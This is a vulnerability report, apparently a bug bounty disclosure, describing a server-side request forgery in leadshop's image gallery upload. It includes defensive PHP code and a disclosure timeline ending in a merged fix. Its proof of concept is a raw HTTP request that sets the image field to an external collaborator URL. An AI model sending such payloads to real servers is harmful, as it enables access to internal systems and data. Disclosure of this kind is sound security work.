Server-Side Request Forgery via upload image gallery in qmpaas/leadshop

Valid

Reported on

May 26th 2022


Description

When an image is uploaded to the gallery, the server loads it with the file_get_contents function from the data: scheme URL sent by the client. Because that URL is not validated, an attacker can replace it with a URL of any other scheme: http:// makes the server send a request to an arbitrary URL, file:// reads a local file, and so on.
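As an added example (not leadshop's own code; the function names, parameter names and the sample data: URL are assumptions), the vulnerable pattern the report describes is shown beside a hardened handler that parses the data: URL itself instead of handing a client-controlled string to file_get_contents:

```php
<?php
// Added example, not leadshop's code. Function names, parameters and the
// sample data: URL below are assumptions used to illustrate the pattern.

// Vulnerable pattern from the report: the client-supplied "content" value
// goes straight into file_get_contents(), so every stream wrapper PHP knows
// (http://, file://, ...) is honoured, not only the intended data: URL.
function saveGalleryImageVulnerable(string $content, string $dest): bool
{
    $bytes = file_get_contents($content);
    return $bytes !== false && file_put_contents($dest, $bytes) !== false;
}

// Hardened form: decode the data: URL ourselves, so no other scheme is
// ever reachable, and verify that the payload really is an image.
function decodeImageDataUrl(string $content, int $maxBytes = 5 * 1024 * 1024): ?string
{
    // Only base64-encoded data: URLs with an image media type are accepted.
    $re = '#^data:(image/(?:png|jpeg|gif|webp));base64,([A-Za-z0-9+/=\r\n]+)$#';
    if (!preg_match($re, $content, $m)) {
        return null;
    }
    $bytes = base64_decode($m[2], true);   // strict mode rejects malformed input
    if ($bytes === false || strlen($bytes) > $maxBytes) {
        return null;
    }
    // Cross-check the declared media type against the actual image header.
    $info = @getimagesizefromstring($bytes);
    if ($info === false || $info['mime'] !== $m[1]) {
        return null;
    }
    return $bytes;
}

function saveGalleryImageHardened(string $content, string $dest): bool
{
    $bytes = decodeImageDataUrl($content);
    if ($bytes === null) {
        return false;   // anything that is not a valid inline image is rejected
    }
    return file_put_contents($dest, $bytes) !== false;
}

// Constructed sample input: a 1x1 PNG as a data: URL, accepted by the
// hardened handler; the http:// value from the report's PoC and a file://
// URL are both rejected before any stream function is touched.
$png = 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJ'
     . 'AAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==';
var_dump(decodeImageDataUrl($png) !== null);
var_dump(decodeImageDataUrl('http://ysuel0pxqg3wvmaizyvshw83ouuki9.burpcollaborator.net/ssrf'));
var_dump(decodeImageDataUrl('file:///some/local/file'));
```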

Proof of Concept

POST /index.php?q=/api/leadmall/gallery HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: application/json, text/plain, */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsImp0aSI6Ijk4YzA4YzI1ZjgxMzZkNTkwYyJ9.eyJpc3MiOiJodHRwOlwvXC9sb2NhbGhvc3QiLCJhdWQiOiJodHRwOlwvXC9sb2NhbGhvc3QiLCJqdGkiOiI5OGMwOGMyNWY4MTM2ZDU5MGMiLCJpYXQiOjE2NTM1ODIzNjIsImV4cCI6MTY1NjE3NDM2MiwiaWQiOjF9.leK1uig5bqE77ZcsCd6kaNpaMwz7SkPjuq38eHrytj8
QM-APP-TYPE: undefined
QM-APP-ID: 98c08c25f8136d590c
QM-APP-SECRET: 3AYpU16dZ1CY7ejqvrE39B351vanLJVD
Content-Length: 162
Origin: http://localhost
Connection: close
Referer: http://localhost/index.php?r=admin%2Findex
Cookie: _csrf=6173ae085358868d37d1217a51c7fa0d0f4e8f4ff1bc5c02ee4821b0ef541f40a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22ldQlSO9tUQ9FAJbS1H3lDUd-3qdmZFnP%22%3B%7D
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-PwnFox-Color: blue

{"type":1,"group_id":-1,"content":"http://ysuel0pxqg3wvmaizyvshw83ouuki9.burpcollaborator.net/ssrf","title":"280864382_542263584214444_7204343006064197991_n.jpg"}

Image PoC

(screenshot of the PoC not reproduced here)

Impact

A successful SSRF attack can often result in unauthorized actions or access to data within the organization.

We are processing your report and will contact the qmpaas/leadshop team within 24 hours. 2 months ago
We have contacted a member of the qmpaas/leadshop team and are waiting to hear back 2 months ago
We have sent a follow up to the qmpaas/leadshop team. We will try again in 7 days. 2 months ago
We have sent a second follow up to the qmpaas/leadshop team. We will try again in 10 days. 2 months ago
We have sent a third and final follow up to the qmpaas/leadshop team. This report is now considered stale. 2 months ago
leadshop开源商城 modified the Severity from Critical (9.1) to High (8.2) a month ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
leadshop开源商城 validated this vulnerability a month ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
leadshop开源商城 confirmed that a fix has been merged on 44dba1 a month ago
leadshop开源商城 has been awarded the fix bounty